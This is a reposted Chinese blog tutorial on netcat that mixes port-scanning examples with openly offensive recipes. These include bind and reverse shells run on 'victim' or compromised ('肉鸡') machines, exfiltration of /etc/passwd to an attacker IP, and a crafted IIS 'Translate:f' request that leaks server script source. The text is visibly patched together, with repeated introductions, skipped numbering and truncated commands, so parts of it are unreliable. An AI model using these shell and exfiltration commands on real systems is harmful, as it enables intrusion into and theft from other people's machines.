最近在搞反向连接,试来试去发现最好的工具还是nc。正好趁这个机会把nc的用法总结一下:

1.端口扫描:
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002 扫描192.168.1.1的5000-5002端口,网络超时的时间设为5秒。 2.开设后门:
victim machine:
nc -l -p port -e cmd.exe //windows
nc -l -p port -e /bin/sh //*nix
attack machine:
nc ip port 3.反向连接
victim machine:
nc -e cmd.exe ip port //windows
nc -e /bin/sh ip port //*nix
attack machine:
nc -vv -l -p port 4.传送文件
从victim machine上拉文件下来:
victim machine:
nc attack_ip port < /etc/passwd
attacker machine:
nc -d -l -p port > tmp 从attack machine上下载文件:
attacker machine:
nc -d -l -p port < tmp
victim machine:
nc attack_ip port > tmp 需要注意的地方:
linux安装时往往自带了netcat,命令名为nc。但是可能是为了安全原因,去掉了-e参数。如果需要完全版本的netcat,需要到网上下载后,编译。 ``
---

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……

一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,

能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几

乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。

nc命令详解

Filed under: security — ranbo @ 9:08 pm

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……

一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,

能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几

乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。

在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译

后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,

有此功能的原版NC好象要60KB:P),虽然”体积”小,但很完成很多工作。

一、基本使用

想要连接到某处: nc [-options] hostname port[s] [ports] …

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, …

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP模式

-v 详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉——用于扫描时

其中端口号可以指定一个或者用lo-hi式的指定范围。

例如:扫描端口

tcp扫描

C:nc>nc -v -z -w2 192.168.0.80 1-140

net [192.168.0.80] 140 (?)

net [192.168.0.80] 139 (netbios-ssn) open

net [192.168.0.80] 138 (?)

net [192.168.0.80] 137 (netbios-ns)

net [192.168.0.80] 136 (?)

net [192.168.0.80] 135 (epmap) open

net [192.168.0.80] 81 (?) open

net [192.168.0.80] 80 (http) open

net [192.168.0.80] 79 (finger)

net [192.168.0.80] 25 (smtp) open

net [192.168.0.80] 24 (?)

net [192.168.0.80] 23 (telnet)

net [192.168.0.80] 21 (ftp)

udp扫描

C:nc>nc -u -v -z -w2 192.168.0.80 1-140

net [192.168.0.80] 140 (?) open

net [192.168.0.80] 139 (?) open

net [192.168.0.80] 138 (netbios-dgm) open

net [192.168.0.80] 137 (netbios-ns) open

net [192.168.0.80] 54 (?) open

net [192.168.0.80] 53 (domain) open

net [192.168.0.80] 38 (?) open

net [192.168.0.80] 37 (time) open

net [192.168.0.80] 7 (echo) open

二、高级应用

1.IE的MIME欺骗

这个网站目录提供了黑客的n关,过了这n关证明你开始入门了。我做的

http://www.try2hack.nl

的国产版。

这个页面告诉我们的浏览器不是 IE6.72,我们的作系统不是LIUNX,我们不是从

www.microsoft.com/ms.htm

重定向链接过去的,linux有 IE6.72? 微软会在它的页面上放

http://www.try2hack.nl/cgi-bin/level7.pl

的链接?

nc 221.10.222.34 80

GET /level/level7.php HTTP/1.1

Accept:image/gif,image/x-xbitmap,application/msword,
/*

Referer:http://www.microsoft.com/ms.htm

Accept-Language:zh-cn

Accept-Encodeing:gzip,deflate

User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686)

Host:221.10.222.34

Connection:Keep-Alive

2.IIS 5 “Translate:f” 显示代码脆弱点

Translate:f脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f,并有一个反斜杠””附于URL之后。下面就有这样的一个例子([CRLF]代表回车字符)

注意 GET global.asa 后的反斜杠以及Translate:f头信息。

GET /global.asa HTTP/1.0

Host:192.168.0.1

User-Agent:SensePostData

Content-Type:application/x-www-form-urlencoded

Translate:f

[CRLF]

[CRLF]

将以上内容保存在一个文本文件中(例如example.txt)

然后向一个有这个漏洞的服务器发送

c:>type example.txt | nc –nvv 192.168.0.80 80

(UNKNOWN) [192.168.0.80] 80 (?) open

HTTP/1.1 200 OK

Server: Microsoft-IIS/5.0

Date: Tue, 03 Dec 2002 08:50:46 GMT

Content-Type: application/octet-stream

Content-Length: 2790

ETag: “0448299fcd6df1:bea”

Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT

Accept-Ranges: bytes

Cache-Control: no-cache

举例:

1)连接到REMOTE主机,例子:

格式:nc -nvv 192.168.x.x 80

讲解:连到192.168.x.x的TCP80端口

2)监听LOCAL主机,例子:

格式:nc -l -p 80

讲解:监听本机的TCP80端口

3)扫描远程主机,例子:

格式:nc -nvv -w2 -z 192.168.x.x 80-445

讲解:扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL,例子:

格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe

讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接,例子:

格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,

当配合管道命令”|”与重定向命令”“等等命令功能更强大……)。

高级用法:

6)作攻击程序用,例子:

格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80

格式2:nc -nvv 192.168.x.x 80 c:log.txt

讲解:使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把‘>’

改为‘>>’即可以追加日志

附:’c:log.txt’为日志等

9)作蜜罐用[3],例子:

格式1:nc -L -p 80 e:log.dat

nc -l -v -p port

参数解释:

-l:监听端口,监听入站信息

-p:后跟本地端口号

-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

提示:一般大家都爱用-vv

nc -l -p 80

这个很简单,监听80端口

如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!

nc -l -p 80 > e:log.dat

呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO

那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件

nc -l -v -p 80

和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC

的屏幕上。

呵呵,讲了这么多,来实践下

nc -l -v -p 80

然后在浏览器中输入本机IP:127.0.0.1

呵呵,看到什么?

同样,上边两个也是一样,大家自己试验一下吧

命令2:程序定向

nc -l -p port -t -e cmd.exe

本地机: nc -l -p port 或 nc -l -v -p port

目标机:nc -e cmd.exe ip port

参数解释:

-l、-p两个参数已经解释过了

-e;作用就是程序定向

-t:以telnet的形式来应答

例子

nc -l -p 5277 -t -e cmd.exe

知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器

就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的

入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。

说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)

呵呵,咱们来找台肉鸡试试,我TELNET IP 5277

HOHO如何?

local machine:nc -l -p port ( or nc -l -v -p port )

remote machine:nc -e cmd.exe ip port

大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,

什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说

不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你

这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。

这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?

咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)

nc -l -p 5277 (坚听本地5277端口)

同样也可以用

nc -l -v -p 5277

运行在本地

然后在远程机器上,想办法运行

nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!

呵呵,看看在本地机器上出现了什么?

这样就是反弹在本地机器上得到了一个SHELL

命令3:扫描端口

nc -v ip port

nc -v -z ip port-port

nc -v -z -u ip port-port

参数解释:

-z:将输入输出关掉,在扫描时使用

nc -v ip port

这个命令是针对某一个端口进行扫描

例如:

nc -v ip 135

扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息

例如:80端口

我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息

nc -v -z ip port-port

这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围

例如:

nc -v -z ip 1-200

可以看到我机器上的1-200的TCP端口的开放情况

nc -v -z -u ip port-port

这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的

例如:

nc -v -z -u ip 1-200

这个命令就会扫1-200的UDP端口

命令4:传送文件(HOHO,I LIKE)

LOCAL MACHINE:nc -v -n ip port y:svr.exe

参数解释:

-n:指定数字的IP地址

这两个命令结合起来是用来传送文件的

首先,在远程机上运行命令:

nc -v -l -p 5277 > c:pulist.exe

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

并把接受到的信息数据写到c:pulist.exe中

这时候在本地机上运行

nc -v -n ip 5277

本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/59178/showart_1296797.html

[转载]nc命令详解的更多相关文章

  1. [转载]Linux 命令详解:./configure、make、make install 命令

    [转载]Linux 命令详解:./configure.make.make install 命令 来源:https://www.cnblogs.com/tinywan/p/7230039.html 这些 ...

  2. linux nc 命令详解

    linux nc命令使用详解 功能说明:功能强大的网络工具语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o&l ...

  3. Linux nc命令详解

    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具,可通 ...

  4. nc之二:nc命令详解

    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具,可通 ...

  5. nc命令详解

    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本.因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小).功能实用,被设计为一个简单.可靠的网络工具,可通 ...

  6. Linux之nc命令详解

    nc是一个强大的网络工具,可以通过yum安装 [root@LB2 ~]# which nc /usr/bin/which: no nc in (/usr/local/sbin:/usr/local/b ...

  7. [Linux][转载]Curl命令详解

    命令:curl 在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具,是一款很强大的http命令行工具,当处在无界面的服务器上的时候,利用curl下载上传文件是较为方便的事情. 语法 ...

  8. linux netcat 命令详解

    功能说明:强大的网络工具语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p< ...

  9. Linux防火墙iptables学习笔记(三)iptables命令详解和举例[转载]

     Linux防火墙iptables学习笔记(三)iptables命令详解和举例 2008-10-16 23:45:46 转载 网上看到这个配置讲解得还比较易懂,就转过来了,大家一起看下,希望对您工作能 ...

随机推荐

  1. ConcurrentHashMap怎么保证安全的

    HashMap是一个线程不安全的容器,当容量大于总量*负载因子发生扩容时可能会出现环形链表从而导致死循环 扩容就是rehash,这个会重新将原数组的内容重新hash到新的扩容数组中,在多线程的环境下, ...

  2. Solution -「CEOI 2017」「洛谷 P4654」Mousetrap

    \(\mathscr{Description}\)   Link.   在一个含 \(n\) 个结点的树形迷宫中,迷宫管理者菈米莉丝和一只老鼠博弈.老鼠初始时在结点 \(y\),有且仅有结点 \(x\ ...

  3. mysql,数据类型与表操作

    一.mysql基本认知 创建用户 create host aa identified with mysql_native_password by ''; 修改用户权限 alter user root@ ...

  4. suse 12 sp3 利用shell脚本离线编译安装ansible

    # 测试环境是suse 12 sp3的系统,机器都是内网使用的,安装ansible真的很难顶 # 测试环境使用的python版本:2.7.13-27 # 此脚本只在本人测试环境成功,其他环境,需要选择 ...

  5. Spring声明式事务的两种配置方式(注解/xml)

    application配置tx:annotation-driven 配置声明式事务tx:TransactionManager 声明式事务需要数据源所以需要配置DataSource 使用:在类或者方法上 ...

  6. 搭建sock5代理

    安装 下载脚本 wget --no-check-certificate https://raw.github.com/Lozy/danted/master/install.sh -O install. ...

  7. 使用Hot Chocolate和.NET 6构建GraphQL应用(9) —— 实现Mutate更新数据

    系列导航 使用Hot Chocolate和.NET 6构建GraphQL应用文章索引 需求 在上一篇文章中,我们演示了如何使用Hot Chocolate进行GraphQL的Mutate新增数据,这篇文 ...

  8. Prometheus之Dockerfile编写、镜像构建、容器启动

    目录 从官方镜像启动:prom/prometheus 官方Dockerfile分析 编写自己的Dockerfile 构建镜像: 启动容器: 从官方镜像启动:prom/prometheus 拉取镜像 $ ...

  9. Linux安装Python xlrd、xlwt、xlutils模块

    一.安装setuptools: 可以先打开setuptools的python官网看看setuptools软件包如何安装: 1 > wget https://bitbucket.org/pypa/ ...

  10. 还在争论WPS、Office哪个更好用?这款云办公工具才是真的香!

    最近,金山WPS更新狠狠的刷了一波存在感.尤其是xlookup函数,着实是有被惊艳到,也让大家看到了国产办公软件的进步.甚至有人认为WPS已经超越了传统的办公软件--微软office.WPS的优点固然 ...